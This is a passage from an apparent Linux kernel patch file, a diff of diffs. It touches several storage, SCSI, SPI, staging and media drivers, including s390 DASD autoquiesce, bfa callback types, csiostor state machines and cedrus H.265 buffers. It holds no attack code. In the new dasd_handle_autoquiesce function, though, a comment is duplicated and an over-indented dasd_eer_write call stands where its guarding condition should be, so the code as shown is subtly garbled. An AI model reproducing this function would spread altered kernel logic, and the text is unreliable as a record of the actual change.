+-		module_put(base_discipline->owner);
+ 		dasd_delete_device(device);
+ 		return -EINVAL;
+ 	}
+-	device->base_discipline = base_discipline;
+ 	device->discipline = discipline;
+ 
+ 	/* check_device will allocate block device if necessary */
+ 	rc = discipline->check_device(device);
+ 	if (rc) {
+-		pr_warn("%s Setting the DASD online with discipline %s failed with rc=%i\n",
+-			dev_name(&cdev->dev), discipline->name, rc);
+-		module_put(discipline->owner);
+-		module_put(base_discipline->owner);
++		dev_warn(dev, "Setting the DASD online with discipline %s failed with rc=%i\n",
++			 discipline->name, rc);
+ 		dasd_delete_device(device);
+ 		return rc;
+ 	}
+ 
+ 	dasd_set_target_state(device, DASD_STATE_ONLINE);
+ 	if (device->state <= DASD_STATE_KNOWN) {
+-		pr_warn("%s Setting the DASD online failed because of a missing discipline\n",
+-			dev_name(&cdev->dev));
++		dev_warn(dev, "Setting the DASD online failed because of a missing discipline\n");
+ 		rc = -ENODEV;
+ 		dasd_set_target_state(device, DASD_STATE_NEW);
+ 		if (device->block)
+ 			dasd_free_block(device->block);
+ 		dasd_delete_device(device);
+-	} else
+-		pr_debug("dasd_generic device %s found\n",
+-				dev_name(&cdev->dev));
++	} else {
++		dev_dbg(dev, "dasd_generic device found\n");
++	}
+ 
+ 	wait_event(dasd_init_waitq, _wait_for_device(device));
+ 
+@@ -3557,10 +3549,13 @@ EXPORT_SYMBOL_GPL(dasd_generic_set_online);
+ 
+ int dasd_generic_set_offline(struct ccw_device *cdev)
+ {
++	int max_count, open_count, rc;
+ 	struct dasd_device *device;
+ 	struct dasd_block *block;
+-	int max_count, open_count, rc;
+ 	unsigned long flags;
++	struct device *dev;
++
++	dev = &cdev->dev;
+ 
+ 	rc = 0;
+ 	spin_lock_irqsave(get_ccwdev_lock(cdev), flags);
+@@ -3581,11 +3576,10 @@ int dasd_generic_set_offline(struct ccw_device *cdev)
+ 		open_count = atomic_read(&device->block->open_count);
+ 		if (open_count > max_count) {
+ 			if (open_count > 0)
+-				pr_warn("%s: The DASD cannot be set offline with open count %i\n",
+-					dev_name(&cdev->dev), open_count);
++				dev_warn(dev, "The DASD cannot be set offline with open count %i\n",
++					 open_count);
+ 			else
+-				pr_warn("%s: The DASD cannot be set offline while it is in use\n",
+-					dev_name(&cdev->dev));
++				dev_warn(dev, "The DASD cannot be set offline while it is in use\n");
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -3682,8 +3676,8 @@ int dasd_generic_last_path_gone(struct dasd_device *device)
+ 	dev_warn(&device->cdev->dev, "No operational channel path is left "
+ 		 "for the device\n");
+ 	DBF_DEV_EVENT(DBF_WARNING, device, "%s", "last path gone");
+-	/* First of all call extended error reporting. */
+-	dasd_eer_write(device, NULL, DASD_EER_NOPATH);
++	/* First call extended error reporting and check for autoquiesce. */
++	dasd_handle_autoquiesce(device, NULL, DASD_EER_NOPATH);
+ 
+ 	if (device->state < DASD_STATE_BASIC)
+ 		return 0;
+@@ -3815,7 +3809,8 @@ void dasd_generic_path_event(struct ccw_device *cdev, int *path_event)
+ 			 "No verified channel paths remain for the device\n");
+ 		DBF_DEV_EVENT(DBF_WARNING, device,
+ 			      "%s", "last verified path gone");
+-		dasd_eer_write(device, NULL, DASD_EER_NOPATH);
++		/* First call extended error reporting and check for autoquiesce. */
++		dasd_handle_autoquiesce(device, NULL, DASD_EER_NOPATH);
+ 		dasd_device_set_stop_bits(device,
+ 					  DASD_STOPPED_DC_WAIT);
+ 	}
+@@ -3837,7 +3832,8 @@ EXPORT_SYMBOL_GPL(dasd_generic_verify_path);
+ void dasd_generic_space_exhaust(struct dasd_device *device,
+ 				struct dasd_ccw_req *cqr)
+ {
+-	dasd_eer_write(device, NULL, DASD_EER_NOSPC);
++	/* First call extended error reporting and check for autoquiesce. */
++	dasd_handle_autoquiesce(device, NULL, DASD_EER_NOSPC);
+ 
+ 	if (device->state < DASD_STATE_BASIC)
+ 		return;
+@@ -3931,6 +3927,31 @@ void dasd_schedule_requeue(struct dasd_device *device)
+ }
+ EXPORT_SYMBOL(dasd_schedule_requeue);
+ 
++static int dasd_handle_autoquiesce(struct dasd_device *device,
++				   struct dasd_ccw_req *cqr,
++				   unsigned int reason)
++{
++	/* in any case write eer message with reason */
++	/* in any case, write an EER message with the reason */
++		dasd_eer_write(device, cqr, reason);
++
++	if (!test_bit(reason, &device->aq_mask))
++		return 0;
++
++	/* notify eer about autoquiesce */
++	if (dasd_eer_enabled(device))
++		dasd_eer_write(device, NULL, DASD_EER_AUTOQUIESCE);
++
++	dev_info(&device->cdev->dev,
++		 "The DASD has been put in the quiesce state\n");
++	dasd_device_set_stop_bits(device, DASD_STOPPED_QUIESCE);
++
++	if (device->features & DASD_FEATURE_REQUEUEQUIESCE)
++		dasd_schedule_requeue(device);
++
++	return 1;
++}
++
+ static struct dasd_ccw_req *dasd_generic_build_rdc(struct dasd_device *device,
+ 						   int rdc_buffer_size,
+ 						   int magic)
+diff --git a/drivers/s390/block/dasd_eer.c b/drivers/s390/block/dasd_eer.c
+index d4d31cd11d261..d16c699b9ac6d 100644
+--- a/drivers/s390/block/dasd_eer.c
++++ b/drivers/s390/block/dasd_eer.c
+@@ -387,6 +387,7 @@ void dasd_eer_write(struct dasd_device *device, struct dasd_ccw_req *cqr,
+ 		break;
+ 	case DASD_EER_NOPATH:
+ 	case DASD_EER_NOSPC:
++	case DASD_EER_AUTOQUIESCE:
+ 		dasd_eer_write_standard_trigger(device, NULL, id);
+ 		break;
+ 	case DASD_EER_STATECHANGE:
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index f50932518f83a..00bcd177264ac 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -464,6 +464,7 @@ extern struct dasd_discipline *dasd_diag_discipline_pointer;
+ #define DASD_EER_STATECHANGE 3
+ #define DASD_EER_PPRCSUSPEND 4
+ #define DASD_EER_NOSPC	     5
++#define DASD_EER_AUTOQUIESCE 31
+ 
+ /* DASD path handling */
+ 
+@@ -641,6 +642,7 @@ struct dasd_device {
+ 	struct dasd_format_entry format_entry;
+ 	struct kset *paths_info;
+ 	struct dasd_copy_relation *copy;
++	unsigned long aq_mask;
+ };
+ 
+ struct dasd_block {
+diff --git a/drivers/scsi/bfa/bfa.h b/drivers/scsi/bfa/bfa.h
+index 7bd2ba1ad4d11..f30fe324e6ecc 100644
+--- a/drivers/scsi/bfa/bfa.h
++++ b/drivers/scsi/bfa/bfa.h
+@@ -20,7 +20,6 @@
+ struct bfa_s;
+ 
+ typedef void (*bfa_isr_func_t) (struct bfa_s *bfa, struct bfi_msg_s *m);
+-typedef void (*bfa_cb_cbfn_status_t) (void *cbarg, bfa_status_t status);
+ 
+ /*
+  * Interrupt message handlers
+@@ -437,4 +436,12 @@ struct bfa_cb_pending_q_s {
+ 	(__qe)->data = (__data);				\
+ } while (0)
+ 
++#define bfa_pending_q_init_status(__qe, __cbfn, __cbarg, __data) do {	\
++	bfa_q_qe_init(&((__qe)->hcb_qe.qe));			\
++	(__qe)->hcb_qe.cbfn_status = (__cbfn);			\
++	(__qe)->hcb_qe.cbarg = (__cbarg);			\
++	(__qe)->hcb_qe.pre_rmv = BFA_TRUE;			\
++	(__qe)->data = (__data);				\
++} while (0)
++
+ #endif /* __BFA_H__ */
+diff --git a/drivers/scsi/bfa/bfa_core.c b/drivers/scsi/bfa/bfa_core.c
+index 6846ca8f7313c..3438d0b8ba062 100644
+--- a/drivers/scsi/bfa/bfa_core.c
++++ b/drivers/scsi/bfa/bfa_core.c
+@@ -1907,15 +1907,13 @@ bfa_comp_process(struct bfa_s *bfa, struct list_head *comp_q)
+ 	struct list_head		*qe;
+ 	struct list_head		*qen;
+ 	struct bfa_cb_qe_s	*hcb_qe;
+-	bfa_cb_cbfn_status_t	cbfn;
+ 
+ 	list_for_each_safe(qe, qen, comp_q) {
+ 		hcb_qe = (struct bfa_cb_qe_s *) qe;
+ 		if (hcb_qe->pre_rmv) {
+ 			/* qe is invalid after return, dequeue before cbfn() */
+ 			list_del(qe);
+-			cbfn = (bfa_cb_cbfn_status_t)(hcb_qe->cbfn);
+-			cbfn(hcb_qe->cbarg, hcb_qe->fw_status);
++			hcb_qe->cbfn_status(hcb_qe->cbarg, hcb_qe->fw_status);
+ 		} else
+ 			hcb_qe->cbfn(hcb_qe->cbarg, BFA_TRUE);
+ 	}
+diff --git a/drivers/scsi/bfa/bfa_ioc.h b/drivers/scsi/bfa/bfa_ioc.h
+index 933a1c3890ff5..5e568d6d7b261 100644
+--- a/drivers/scsi/bfa/bfa_ioc.h
++++ b/drivers/scsi/bfa/bfa_ioc.h
+@@ -361,14 +361,18 @@ struct bfa_reqq_wait_s {
+ 	void	*cbarg;
+ };
+ 
+-typedef void	(*bfa_cb_cbfn_t) (void *cbarg, bfa_boolean_t complete);
++typedef void (*bfa_cb_cbfn_t) (void *cbarg, bfa_boolean_t complete);
++typedef void (*bfa_cb_cbfn_status_t) (void *cbarg, bfa_status_t status);
+ 
+ /*
+  * Generic BFA callback element.
+  */
+ struct bfa_cb_qe_s {
+ 	struct list_head	qe;
+-	bfa_cb_cbfn_t	cbfn;
++	union {
++		bfa_cb_cbfn_status_t	cbfn_status;
++		bfa_cb_cbfn_t		cbfn;
++	};
+ 	bfa_boolean_t	once;
+ 	bfa_boolean_t	pre_rmv;	/* set for stack based qe(s) */
+ 	bfa_status_t	fw_status;	/* to access fw status in comp proc */
+diff --git a/drivers/scsi/bfa/bfad_bsg.c b/drivers/scsi/bfa/bfad_bsg.c
+index be8dfbe13e904..524e4e6979c9f 100644
+--- a/drivers/scsi/bfa/bfad_bsg.c
++++ b/drivers/scsi/bfa/bfad_bsg.c
+@@ -2135,8 +2135,7 @@ bfad_iocmd_fcport_get_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_cb_pending_q_s cb_qe;
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, &iocmd->stats);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, &iocmd->stats);
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	iocmd->status = bfa_fcport_get_stats(&bfad->bfa, &cb_qe);
+ 	spin_unlock_irqrestore(&bfad->bfad_lock, flags);
+@@ -2159,7 +2158,7 @@ bfad_iocmd_fcport_reset_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_cb_pending_q_s cb_qe;
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp, &fcomp, NULL);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, NULL);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	iocmd->status = bfa_fcport_clear_stats(&bfad->bfa, &cb_qe);
+@@ -2443,8 +2442,7 @@ bfad_iocmd_qos_get_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_fcport_s *fcport = BFA_FCPORT_MOD(&bfad->bfa);
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, &iocmd->stats);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, &iocmd->stats);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	WARN_ON(!bfa_ioc_get_fcmode(&bfad->bfa.ioc));
+@@ -2474,8 +2472,7 @@ bfad_iocmd_qos_reset_stats(struct bfad_s *bfad, void *cmd)
+ 	struct bfa_fcport_s *fcport = BFA_FCPORT_MOD(&bfad->bfa);
+ 
+ 	init_completion(&fcomp.comp);
+-	bfa_pending_q_init(&cb_qe, (bfa_cb_cbfn_t)bfad_hcb_comp,
+-			   &fcomp, NULL);
++	bfa_pending_q_init_status(&cb_qe, bfad_hcb_comp, &fcomp, NULL);
+ 
+ 	spin_lock_irqsave(&bfad->bfad_lock, flags);
+ 	WARN_ON(!bfa_ioc_get_fcmode(&bfad->bfa.ioc));
+diff --git a/drivers/scsi/csiostor/csio_defs.h b/drivers/scsi/csiostor/csio_defs.h
+index c38017b4af982..e50e93e7fe5a1 100644
+--- a/drivers/scsi/csiostor/csio_defs.h
++++ b/drivers/scsi/csiostor/csio_defs.h
+@@ -73,7 +73,21 @@ csio_list_deleted(struct list_head *list)
+ #define csio_list_prev(elem)	(((struct list_head *)(elem))->prev)
+ 
+ /* State machine */
+-typedef void (*csio_sm_state_t)(void *, uint32_t);
++struct csio_lnode;
++
++/* State machine events */
++enum csio_ln_ev {
++	CSIO_LNE_NONE = (uint32_t)0,
++	CSIO_LNE_LINKUP,
++	CSIO_LNE_FAB_INIT_DONE,
++	CSIO_LNE_LINK_DOWN,
++	CSIO_LNE_DOWN_LINK,
++	CSIO_LNE_LOGO,
++	CSIO_LNE_CLOSE,
++	CSIO_LNE_MAX_EVENT,
++};
++
++typedef void (*csio_sm_state_t)(struct csio_lnode *ln, enum csio_ln_ev evt);
+ 
+ struct csio_sm {
+ 	struct list_head	sm_list;
+@@ -83,7 +97,7 @@ struct csio_sm {
+ static inline void
+ csio_set_state(void *smp, void *state)
+ {
+-	((struct csio_sm *)smp)->sm_state = (csio_sm_state_t)state;
++	((struct csio_sm *)smp)->sm_state = state;
+ }
+ 
+ static inline void
+diff --git a/drivers/scsi/csiostor/csio_lnode.c b/drivers/scsi/csiostor/csio_lnode.c
+index d5ac938970232..5b3ffefae476d 100644
+--- a/drivers/scsi/csiostor/csio_lnode.c
++++ b/drivers/scsi/csiostor/csio_lnode.c
+@@ -1095,7 +1095,7 @@ csio_handle_link_down(struct csio_hw *hw, uint8_t portid, uint32_t fcfi,
+ int
+ csio_is_lnode_ready(struct csio_lnode *ln)
+ {
+-	return (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_ready));
++	return (csio_get_state(ln) == csio_lns_ready);
+ }
+ 
+ /*****************************************************************************/
+@@ -1366,15 +1366,15 @@ csio_free_fcfinfo(struct kref *kref)
+ void
+ csio_lnode_state_to_str(struct csio_lnode *ln, int8_t *str)
+ {
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_uninit)) {
++	if (csio_get_state(ln) == csio_lns_uninit) {
+ 		strcpy(str, "UNINIT");
+ 		return;
+ 	}
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_ready)) {
++	if (csio_get_state(ln) == csio_lns_ready) {
+ 		strcpy(str, "READY");
+ 		return;
+ 	}
+-	if (csio_get_state(ln) == ((csio_sm_state_t)csio_lns_offline)) {
++	if (csio_get_state(ln) == csio_lns_offline) {
+ 		strcpy(str, "OFFLINE");
+ 		return;
+ 	}
+diff --git a/drivers/scsi/csiostor/csio_lnode.h b/drivers/scsi/csiostor/csio_lnode.h
+index 372a67d122d38..607698a0f0631 100644
+--- a/drivers/scsi/csiostor/csio_lnode.h
++++ b/drivers/scsi/csiostor/csio_lnode.h
+@@ -53,19 +53,6 @@
+ extern int csio_fcoe_rnodes;
+ extern int csio_fdmi_enable;
+ 
+-/* State machine evets */
+-enum csio_ln_ev {
+-	CSIO_LNE_NONE = (uint32_t)0,
+-	CSIO_LNE_LINKUP,
+-	CSIO_LNE_FAB_INIT_DONE,
+-	CSIO_LNE_LINK_DOWN,
+-	CSIO_LNE_DOWN_LINK,
+-	CSIO_LNE_LOGO,
+-	CSIO_LNE_CLOSE,
+-	CSIO_LNE_MAX_EVENT,
+-};
+-
+-
+ struct csio_fcf_info {
+ 	struct list_head	list;
+ 	uint8_t			priority;
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 809be43f440dc..8e6ac08e553bb 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -7398,7 +7398,9 @@ _base_wait_for_iocstate(struct MPT3SAS_ADAPTER *ioc, int timeout)
+ 		return -EFAULT;
+ 	}
+ 
+- issue_diag_reset:
++	return 0;
++
++issue_diag_reset:
+ 	rc = _base_diag_reset(ioc);
+ 	return rc;
+ }
+diff --git a/drivers/soc/fsl/dpio/dpio-service.c b/drivers/soc/fsl/dpio/dpio-service.c
+index 1d2b27e3ea63f..b811446e0fa55 100644
+--- a/drivers/soc/fsl/dpio/dpio-service.c
++++ b/drivers/soc/fsl/dpio/dpio-service.c
+@@ -523,7 +523,7 @@ int dpaa2_io_service_enqueue_multiple_desc_fq(struct dpaa2_io *d,
+ 	struct qbman_eq_desc *ed;
+ 	int i, ret;
+ 
+-	ed = kcalloc(sizeof(struct qbman_eq_desc), 32, GFP_KERNEL);
++	ed = kcalloc(32, sizeof(struct qbman_eq_desc), GFP_KERNEL);
+ 	if (!ed)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/soc/microchip/Kconfig b/drivers/soc/microchip/Kconfig
+index eb656b33156ba..f19e74d342aa2 100644
+--- a/drivers/soc/microchip/Kconfig
++++ b/drivers/soc/microchip/Kconfig
+@@ -1,5 +1,5 @@
+ config POLARFIRE_SOC_SYS_CTRL
+-	tristate "POLARFIRE_SOC_SYS_CTRL"
++	tristate "Microchip PolarFire SoC (MPFS) system controller support"
+ 	depends on POLARFIRE_SOC_MAILBOX
+ 	help
+ 	  This driver adds support for the PolarFire SoC (MPFS) system controller.
+diff --git a/drivers/soc/qcom/rpmhpd.c b/drivers/soc/qcom/rpmhpd.c
+index 9a90f241bb97f..6efe36aeb48e9 100644
+--- a/drivers/soc/qcom/rpmhpd.c
++++ b/drivers/soc/qcom/rpmhpd.c
+@@ -195,7 +195,6 @@ static struct rpmhpd *sa8540p_rpmhpds[] = {
+ 	[SC8280XP_CX] = &cx,
+ 	[SC8280XP_CX_AO] = &cx_ao,
+ 	[SC8280XP_EBI] = &ebi,
+-	[SC8280XP_GFX] = &gfx,
+ 	[SC8280XP_LCX] = &lcx,
+ 	[SC8280XP_LMX] = &lmx,
+ 	[SC8280XP_MMCX] = &mmcx,
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index 6e95efb50acbc..f9ec8742917a6 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -787,17 +787,19 @@ static irqreturn_t mtk_spi_interrupt(int irq, void *dev_id)
+ 		mdata->xfer_len = min(MTK_SPI_MAX_FIFO_SIZE, len);
+ 		mtk_spi_setup_packet(master);
+ 
+-		cnt = mdata->xfer_len / 4;
+-		iowrite32_rep(mdata->base + SPI_TX_DATA_REG,
+-				trans->tx_buf + mdata->num_xfered, cnt);
++		if (trans->tx_buf) {
++			cnt = mdata->xfer_len / 4;
++			iowrite32_rep(mdata->base + SPI_TX_DATA_REG,
++					trans->tx_buf + mdata->num_xfered, cnt);
+ 
+-		remainder = mdata->xfer_len % 4;
+-		if (remainder > 0) {
+-			reg_val = 0;
+-			memcpy(&reg_val,
+-				trans->tx_buf + (cnt * 4) + mdata->num_xfered,
+-				remainder);
+-			writel(reg_val, mdata->base + SPI_TX_DATA_REG);
++			remainder = mdata->xfer_len % 4;
++			if (remainder > 0) {
++				reg_val = 0;
++				memcpy(&reg_val,
++					trans->tx_buf + (cnt * 4) + mdata->num_xfered,
++					remainder);
++				writel(reg_val, mdata->base + SPI_TX_DATA_REG);
++			}
+ 		}
+ 
+ 		mtk_spi_enable_transfer(master);
+diff --git a/drivers/staging/greybus/light.c b/drivers/staging/greybus/light.c
+index 87d36948c6106..c6bd86a5335ab 100644
+--- a/drivers/staging/greybus/light.c
++++ b/drivers/staging/greybus/light.c
+@@ -100,15 +100,15 @@ static struct led_classdev *get_channel_cdev(struct gb_channel *channel)
+ static struct gb_channel *get_channel_from_mode(struct gb_light *light,
+ 						u32 mode)
+ {
+-	struct gb_channel *channel = NULL;
++	struct gb_channel *channel;
+ 	int i;
+ 
+ 	for (i = 0; i < light->channels_count; i++) {
+ 		channel = &light->channels[i];
+-		if (channel && channel->mode == mode)
+-			break;
++		if (channel->mode == mode)
++			return channel;
+ 	}
+-	return channel;
++	return NULL;
+ }
+ 
+ static int __gb_lights_flash_intensity_set(struct gb_channel *channel,
+diff --git a/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c b/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
+index 0c61a2dec2211..81fc4835679f3 100644
+--- a/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
++++ b/drivers/staging/media/deprecated/saa7146/ttpci/budget-av.c
+@@ -1462,7 +1462,8 @@ static int budget_av_attach(struct saa7146_dev *dev, struct saa7146_pci_extensio
+ 		budget_av->has_saa7113 = 1;
+ 		err = saa7146_vv_init(dev, &vv_data);
+ 		if (err != 0) {
+-			/* fixme: proper cleanup here */
++			ttpci_budget_deinit(&budget_av->budget);
++			kfree(budget_av);
+ 			ERR("cannot init vv subsystem\n");
+ 			return err;
+ 		}
+@@ -1471,9 +1472,10 @@ static int budget_av_attach(struct saa7146_dev *dev, struct saa7146_pci_extensio
+ 		vv_data.vid_ops.vidioc_s_input = vidioc_s_input;
+ 
+ 		if ((err = saa7146_register_device(&budget_av->vd, dev, "knc1", VFL_TYPE_VIDEO))) {
+-			/* fixme: proper cleanup here */
+-			ERR("cannot register capture v4l2 device\n");
+ 			saa7146_vv_release(dev);
++			ttpci_budget_deinit(&budget_av->budget);
++			kfree(budget_av);
++			ERR("cannot register capture v4l2 device\n");
+ 			return err;
+ 		}
+ 
+diff --git a/drivers/staging/media/imx/imx-media-csc-scaler.c b/drivers/staging/media/imx/imx-media-csc-scaler.c
+index 1fd39a2fca98a..95cca281e8a37 100644
+--- a/drivers/staging/media/imx/imx-media-csc-scaler.c
++++ b/drivers/staging/media/imx/imx-media-csc-scaler.c
+@@ -803,6 +803,7 @@ static int ipu_csc_scaler_release(struct file *file)
+ 
+ 	dev_dbg(priv->dev, "Releasing instance %p\n", ctx);
+ 
++	v4l2_ctrl_handler_free(&ctx->ctrl_hdlr);
+ 	v4l2_m2m_ctx_release(ctx->fh.m2m_ctx);
+ 	v4l2_fh_del(&ctx->fh);
+ 	v4l2_fh_exit(&ctx->fh);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.h b/drivers/staging/media/sunxi/cedrus/cedrus.h
+index 93a2196006f73..cb99610f3e128 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.h
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.h
+@@ -109,6 +109,11 @@ struct cedrus_buffer {
+ 			unsigned int			position;
+ 			enum cedrus_h264_pic_type	pic_type;
+ 		} h264;
++		struct {
++			void		*mv_col_buf;
++			dma_addr_t	mv_col_buf_dma;
++			ssize_t		mv_col_buf_size;
++		} h265;
+ 	} codec;
+ };
+ 
+@@ -142,10 +147,6 @@ struct cedrus_ctx {
+ 			ssize_t		intra_pred_buf_size;
+ 		} h264;
+ 		struct {
+-			void		*mv_col_buf;
+-			dma_addr_t	mv_col_buf_addr;
+-			ssize_t		mv_col_buf_size;
+-			ssize_t		mv_col_buf_unit_size;
+ 			void		*neighbor_info_buf;
+ 			dma_addr_t	neighbor_info_buf_addr;
+ 			void		*entry_points_buf;
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+index 625f77a8c5bde..9f13c942a806b 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+@@ -90,12 +90,13 @@ static void cedrus_h265_sram_write_data(struct cedrus_dev *dev, void *data,
+ }
+ 
+ static inline dma_addr_t
+-cedrus_h265_frame_info_mv_col_buf_addr(struct cedrus_ctx *ctx,
+-				       unsigned int index, unsigned int field)
++cedrus_h265_frame_info_mv_col_buf_addr(struct vb2_buffer *buf,
++				       unsigned int field)
+ {
+-	return ctx->codec.h265.mv_col_buf_addr + index *
+-	       ctx->codec.h265.mv_col_buf_unit_size +
+-	       field * ctx->codec.h265.mv_col_buf_unit_size / 2;
++	struct cedrus_buffer *cedrus_buf = vb2_to_cedrus_buffer(buf);
++
++	return cedrus_buf->codec.h265.mv_col_buf_dma +
++	       field * cedrus_buf->codec.h265.mv_col_buf_size / 2;
+ }
+ 
+ static void cedrus_h265_frame_info_write_single(struct cedrus_ctx *ctx,
+@@ -108,9 +109,8 @@ static void cedrus_h265_frame_info_write_single(struct cedrus_ctx *ctx,
+ 	dma_addr_t dst_luma_addr = cedrus_dst_buf_addr(ctx, buf, 0);
+ 	dma_addr_t dst_chroma_addr = cedrus_dst_buf_addr(ctx, buf, 1);
+ 	dma_addr_t mv_col_buf_addr[2] = {
+-		cedrus_h265_frame_info_mv_col_buf_addr(ctx, buf->index, 0),
+-		cedrus_h265_frame_info_mv_col_buf_addr(ctx, buf->index,
+-						       field_pic ? 1 : 0)
++		cedrus_h265_frame_info_mv_col_buf_addr(buf, 0),
++		cedrus_h265_frame_info_mv_col_buf_addr(buf, field_pic ? 1 : 0)
+ 	};
+ 	u32 offset = VE_DEC_H265_SRAM_OFFSET_FRAME_INFO +
+ 		     VE_DEC_H265_SRAM_OFFSET_FRAME_INFO_UNIT * index;
+@@ -412,12 +412,13 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	unsigned int width_in_ctb_luma, ctb_size_luma;
+ 	unsigned int log2_max_luma_coding_block_size;
+ 	unsigned int ctb_addr_x, ctb_addr_y;
++	struct cedrus_buffer *cedrus_buf;
+ 	dma_addr_t src_buf_addr;
+-	dma_addr_t src_buf_end_addr;
+ 	u32 chroma_log2_weight_denom;
+ 	u32 num_entry_point_offsets;
+ 	u32 output_pic_list_index;
+ 	u32 pic_order_cnt[2];
++	size_t slice_bytes;
+ 	u8 padding;
+ 	int count;
+ 	u32 reg;
+@@ -428,6 +429,8 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	decode_params = run->h265.decode_params;
+ 	pred_weight_table = &slice_params->pred_weight_table;
+ 	num_entry_point_offsets = slice_params->num_entry_point_offsets;
++	cedrus_buf = vb2_to_cedrus_buffer(&run->dst->vb2_buf);
++	slice_bytes = vb2_get_plane_payload(&run->src->vb2_buf, 0);
+ 
+ 	/*
+ 	 * If entry points offsets are present, we should get them
+@@ -445,31 +448,25 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 		DIV_ROUND_UP(sps->pic_width_in_luma_samples, ctb_size_luma);
+ 
+ 	/* MV column buffer size and allocation. */
+-	if (!ctx->codec.h265.mv_col_buf_size) {
+-		unsigned int num_buffers =
+-			run->dst->vb2_buf.vb2_queue->num_buffers;
+-
++	if (!cedrus_buf->codec.h265.mv_col_buf_size) {
+ 		/*
+ 		 * Each CTB requires a MV col buffer with a specific unit size.
+ 		 * Since the address is given with missing lsb bits, 1 KiB is
+ 		 * added to each buffer to ensure proper alignment.
+ 		 */
+-		ctx->codec.h265.mv_col_buf_unit_size =
++		cedrus_buf->codec.h265.mv_col_buf_size =
+ 			DIV_ROUND_UP(ctx->src_fmt.width, ctb_size_luma) *
+ 			DIV_ROUND_UP(ctx->src_fmt.height, ctb_size_luma) *
+ 			CEDRUS_H265_MV_COL_BUF_UNIT_CTB_SIZE + SZ_1K;
+ 
+-		ctx->codec.h265.mv_col_buf_size = num_buffers *
+-			ctx->codec.h265.mv_col_buf_unit_size;
+-
+ 		/* Buffer is never accessed by CPU, so we can skip kernel mapping. */
+-		ctx->codec.h265.mv_col_buf =
++		cedrus_buf->codec.h265.mv_col_buf =
+ 			dma_alloc_attrs(dev->dev,
+-					ctx->codec.h265.mv_col_buf_size,
+-					&ctx->codec.h265.mv_col_buf_addr,
++					cedrus_buf->codec.h265.mv_col_buf_size,
++					&cedrus_buf->codec.h265.mv_col_buf_dma,
+ 					GFP_KERNEL, DMA_ATTR_NO_KERNEL_MAPPING);
+-		if (!ctx->codec.h265.mv_col_buf) {
+-			ctx->codec.h265.mv_col_buf_size = 0;
++		if (!cedrus_buf->codec.h265.mv_col_buf) {
++			cedrus_buf->codec.h265.mv_col_buf_size = 0;
+ 			return -ENOMEM;
+ 		}
+ 	}
+@@ -481,7 +478,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 
+ 	cedrus_write(dev, VE_DEC_H265_BITS_OFFSET, 0);
+ 
+-	reg = slice_params->bit_size;
++	reg = slice_bytes * 8;
+ 	cedrus_write(dev, VE_DEC_H265_BITS_LEN, reg);
+ 
+ 	/* Source beginning and end addresses. */
+@@ -495,10 +492,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 
+ 	cedrus_write(dev, VE_DEC_H265_BITS_ADDR, reg);
+ 
+-	src_buf_end_addr = src_buf_addr +
+-			   DIV_ROUND_UP(slice_params->bit_size, 8);
+-
+-	reg = VE_DEC_H265_BITS_END_ADDR_BASE(src_buf_end_addr);
++	reg = VE_DEC_H265_BITS_END_ADDR_BASE(src_buf_addr + slice_bytes);
+ 	cedrus_write(dev, VE_DEC_H265_BITS_END_ADDR, reg);
+ 
+ 	/* Coding tree block address */
+@@ -816,9 +810,6 @@ static int cedrus_h265_start(struct cedrus_ctx *ctx)
+ {
+ 	struct cedrus_dev *dev = ctx->dev;
+ 
+-	/* The buffer size is calculated at setup time. */
+-	ctx->codec.h265.mv_col_buf_size = 0;
+-
+ 	/* Buffer is never accessed by CPU, so we can skip kernel mapping. */
+ 	ctx->codec.h265.neighbor_info_buf =
